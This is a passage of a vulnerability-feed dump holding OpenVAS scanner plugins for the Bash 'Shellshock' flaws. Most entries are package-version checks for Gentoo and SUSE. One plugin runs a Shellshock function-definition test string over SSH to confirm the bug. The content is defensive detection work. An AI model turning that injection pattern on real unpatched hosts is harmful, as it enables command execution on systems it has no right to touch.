02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121274\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:55 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201410-01\");\n script_tag(name:\"insight\", value:\"Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further parsing flaws in Bash. The unaffected Gentoo packages listed in this GLSA contain the official patches to fix the issues tracked as CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the official patch known as function prefix patch is included which prevents the exploitation of CVE-2014-6278.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201410-01\");\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6278\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201410-01\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.1_p22\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 3.2_p56\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.0_p43\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.1_p16\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(\"ge 4.2_p52\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"app-shells/bash\", unaffected: make_list(), vulnerable: make_list(\"lt 4.2_p52\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6271"], "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "modified": "2018-11-27T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310802085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802085", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_03.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802085\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 15:52:31 +0530 (Wed, 01 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271, and CVE-2014-6277\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { echo vulnerable; }' /bin/bash -c vt_test\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { echo CVE-2014-6278 vulnerable; }' \" + bash_cmd + \" -c vt_test\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of '='\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6278 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310850615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850615", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850615\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:25 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 12.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1229-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eadline-doc\", rpm:\"eadline-doc~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310850890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850890", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850890\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:37:55 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1259-1\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7169\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7187\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-6271\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7186\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T16:39:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "The remote host is missing an update for the ", "modified": "2020-04-02T00:00:00", "published": "2015-09-18T00:00:00", "id": "OPENVAS:1361412562310850676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850676", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850676\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 10:31:31 +0200 (Fri, 18 Sep 2015)\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\n\n This NVT has been deprecated because no proper information available\n from advisory link.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bash was updated to fix command injection via environment variables.\n (CVE-2014-6271, CVE-2014-7169)\n\n Also a hardening patch was applied that only imports functions over\n BASH_FUNC_ prefixed environment variables.\n\n Also fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents\n and for loop issue\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1254-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as proper information is not available in advisory. There is also no bash~4.2~75.4.1 on opensuse. the complete NVT is wrong.\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850778", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850778", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850778\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and is less serious due to the\n special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_.\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally, two other security issues have been fixed:\n\n * CVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\n * CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1247-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5\", rpm:\"libreadline5~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-32bit\", rpm:\"libreadline5-32bit~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-x86\", rpm:\"bash-x86~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-x86\", rpm:\"libreadline5-x86~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310850616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850616", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) 